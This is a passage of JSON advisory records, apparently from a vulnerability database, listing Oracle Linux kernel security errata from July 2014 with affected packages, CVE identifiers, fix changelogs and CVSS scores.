"packageVersion": "1.5.1-4.0.58", "arch": "i686", "packageFilename": "ofa-2.6.32-400.36.4.el5uek-1.5.1-4.0.58.i686.rpm", "packageName": "ofa-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.5.7-2", "arch": "i686", "packageFilename": "mlnx_en-2.6.32-400.36.4.el5uek-1.5.7-2.i686.rpm", "packageName": "mlnx_en-2.6.32-400.36.4.el5uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.32-400.36.4.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.1-4.0.58", "arch": "x86_64", "packageFilename": "ofa-2.6.32-400.36.4.el6uek-1.5.1-4.0.58.x86_64.rpm", "packageName": "ofa-2.6.32-400.36.4.el6uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-400.36.4.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.32-400.36.4.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.32-400.36.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.32-400.36.4.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "kernel-uek\n[2.6.32-400.36.4uek]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229529] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230692] {CVE-2014-4699}", "edition": 1, "reporter": "Oracle", "published": "2014-07-18T00:00:00", "title": "unbreakable enterprise kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2014-07-18T00:00:00", "id": "ELSA-2014-3048", "href": "http://linux.oracle.com/errata/ELSA-2014-3048.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:17:15", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageFilename": "perf-2.6.32-431.20.5.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "src", "packageFilename": "kernel-2.6.32-431.20.5.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "src", "packageFilename": "kernel-2.6.32-431.20.5.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-431.20.5.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-2.6.32-431.20.5.el6.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-431.20.5.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-431.20.5.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-431.20.5.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-431.20.5.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-431.20.5.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-431.20.5.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-431.20.5.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-431.20.5.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-431.20.5.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}], "description": "[2.6.32-431.20.5]\n- [netdrv] pppol2tp: fail when socket option level is not SOL_PPPOL2TP [1119461 1119462] {CVE-2014-4943}\n[2.6.32-431.20.4]\n- [kernel] utrace: force IRET path after utrace_finish_vfork() (Oleg Nesterov) [1115932 1115933] {CVE-2014-4699}", "edition": 1, "reporter": "Oracle", "published": "2014-07-23T00:00:00", "title": "kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2014-07-23T00:00:00", "id": "ELSA-2014-0924", "href": "http://linux.oracle.com/errata/ELSA-2014-0924.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:16:53", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.215.4.el5uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.215.4.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.215.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.215.4.el6uek.i686.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.215.4.el5uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.215.4.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-2.6.39-400.215.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.215.4.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.215.4.el6uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.215.4.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.215.4.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-devel-2.6.39-400.215.4.el5uek.x86_64.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-400.215.4.el5uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.215.4.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.215.4.el5uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.215.4.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.215.4.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.215.4.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-400.215.4.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.215.4.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.215.4.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-firmware-2.6.39-400.215.4.el5uek.noarch.rpm", "packageName": "kernel-uek-firmware", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-400.215.4.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-400.215.4.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-400.215.4.el5uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.215.4.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-400.215.4.el6uek", "arch": "src", "packageFilename": "kernel-uek-2.6.39-400.215.4.el6uek.src.rpm", "packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-400.215.4.el5uek", "arch": "i686", "packageFilename": "kernel-uek-2.6.39-400.215.4.el5uek.i686.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "[2.6.39-400.215.4]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229505] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230690] {CVE-2014-4699}", "edition": 1, "reporter": "Oracle", "published": "2014-07-17T00:00:00", "title": "unbreakable enterprise kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2014-07-17T00:00:00", "id": "ELSA-2014-3047", "href": "http://linux.oracle.com/errata/ELSA-2014-3047.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:16:18", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-debug-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-headers-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-tools-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-devel-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "noarch", "packageFilename": "kernel-doc-3.10.0-123.4.4.el7.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "perf-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel-tools-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "src", "packageFilename": "kernel-3.10.0-123.4.4.el7.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "python-perf-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-devel-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel-tools-libs-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-3.10.0-123.4.4.el7.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "arch": "x86_64", "packageFilename": "kernel-debug-devel-3.10.0-123.4.4.el7.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}], "description": "[3.10.0-123.4.4]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-123.4.4]\n- [net] l2tp_ppp: fail when socket option level is not SOL_PPPOL2TP (Petr Matousek) [1119465 1119466] {CVE-2014-4943}\n[3.10.0-123.4.3]\n- [x86] ptrace: force IRET path after a ptrace_stop() (Oleg Nesterov) [1115934 1115935] {CVE-2014-4699}", "edition": 1, "reporter": "Oracle", "published": "2014-07-23T00:00:00", "title": "kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2014-07-23T00:00:00", "id": "ELSA-2014-0923", "href": "http://linux.oracle.com/errata/ELSA-2014-0923.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:16:15", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-35.1.3.el6uek", "packageFilename": "kernel-uek-debug-devel-3.8.13-35.1.3.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.3-4.el6", "packageFilename": "dtrace-modules-3.8.13-35.1.3.el6uek-0.4.3-4.el6.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-35.1.3.el6uek", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-35.1.3.el6uek", "packageFilename": "kernel-uek-firmware-3.8.13-35.1.3.el6uek.noarch.rpm", "packageName": "kernel-uek-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-35.1.3.el6uek", "packageFilename": "kernel-uek-3.8.13-35.1.3.el6uek.src.rpm", "packageName": "kernel-uek", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-35.1.3.el6uek", "packageFilename": "kernel-uek-devel-3.8.13-35.1.3.el6uek.x86_64.rpm", "packageName": "kernel-uek-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-35.1.3.el6uek", "packageFilename": "kernel-uek-debug-3.8.13-35.1.3.el6uek.x86_64.rpm", "packageName": "kernel-uek-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-35.1.3.el6uek", "packageFilename": "kernel-uek-doc-3.8.13-35.1.3.el6uek.noarch.rpm", "packageName": "kernel-uek-doc", "arch": "noarch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.8.13-35.1.3.el6uek", "packageFilename": "kernel-uek-3.8.13-35.1.3.el6uek.x86_64.rpm", "packageName": "kernel-uek", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.4.3-4.el6", "packageFilename": "dtrace-modules-3.8.13-35.1.3.el6uek-0.4.3-4.el6.src.rpm", "packageName": "dtrace-modules-3.8.13-35.1.3.el6uek", "arch": "src", "operator": "lt"}], "edition": 1, "description": "kernel-uek\n[3.8.13-35.1.3.el6uek]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229497] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230689] {CVE-2014-4699}\n- net: flow_dissector: fail on evil iph->ihl (Jason Wang) [Orabug: 19231234] {CVE-2013-4348}", "reporter": "Oracle", "published": "2014-07-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "oraclelinux", "title": "unbreakable enterprise kernel security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943", "CVE-2013-4348"], "modified": "2014-07-18T00:00:00", "id": "ELSA-2014-3046", "href": "http://linux.oracle.com/errata/ELSA-2014-3046.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:16:51", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-35.3.2.el7uek", "packageFilename": "kernel-uek-3.8.13-35.3.2.el7uek.x86_64.rpm", "packageName": "kernel-uek", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-35.3.2.el7uek", "packageFilename": "kernel-uek-debug-devel-3.8.13-35.3.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.3-4.el7", "packageFilename": "dtrace-modules-3.8.13-35.3.2.el7uek-0.4.3-4.el7.x86_64.rpm", "packageName": "dtrace-modules-3.8.13-35.3.2.el7uek", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-35.3.2.el7uek", "packageFilename": "kernel-uek-firmware-3.8.13-35.3.2.el7uek.noarch.rpm", "packageName": "kernel-uek-firmware", "arch": "noarch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-35.3.2.el7uek", "packageFilename": "kernel-uek-debug-3.8.13-35.3.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-35.3.2.el7uek", "packageFilename": "kernel-uek-doc-3.8.13-35.3.2.el7uek.noarch.rpm", "packageName": "kernel-uek-doc", "arch": "noarch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-35.3.2.el7uek", "packageFilename": "kernel-uek-3.8.13-35.3.2.el7uek.src.rpm", "packageName": "kernel-uek", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.4.3-4.el7", "packageFilename": "dtrace-modules-3.8.13-35.3.2.el7uek-0.4.3-4.el7.src.rpm", "packageName": "dtrace-modules-3.8.13-35.3.2.el7uek", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.8.13-35.3.2.el7uek", "packageFilename": "kernel-uek-devel-3.8.13-35.3.2.el7uek.x86_64.rpm", "packageName": "kernel-uek-devel", "arch": "x86_64", "operator": "lt"}], "description": "kernel-uek\n[3.8.13-35.3.2.el7uek]\n- l2tp: fix an unprivileged user to kernel privilege escalation (Sasha Levin) [Orabug: 19229497] {CVE-2014-4943} {CVE-2014-4943}\n- ptrace,x86: force IRET path after a ptrace_stop() (Tejun Heo) [Orabug: 19230689] {CVE-2014-4699}\n- net: flow_dissector: fail on evil iph->ihl (Jason Wang) [Orabug: 19231234] {CVE-2013-4348}", "edition": 1, "reporter": "Oracle", "published": "2014-07-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "oraclelinux", "title": "unbreakable enterprise kernel security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943", "CVE-2013-4348"], "modified": "2014-07-23T00:00:00", "id": "ELSA-2014-3049", "href": "http://linux.oracle.com/errata/ELSA-2014-3049.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:17:00", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-devel-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-3.10.0-123.8.1.el7.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "noarch", "packageFilename": "kernel-doc-3.10.0-123.8.1.el7.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "python-perf-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-headers-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "src", "packageFilename": "kernel-3.10.0-123.8.1.el7.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "perf-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-devel-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-123.8.1.el7", "arch": "x86_64", "packageFilename": "kernel-3.10.0-123.8.1.el7.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": 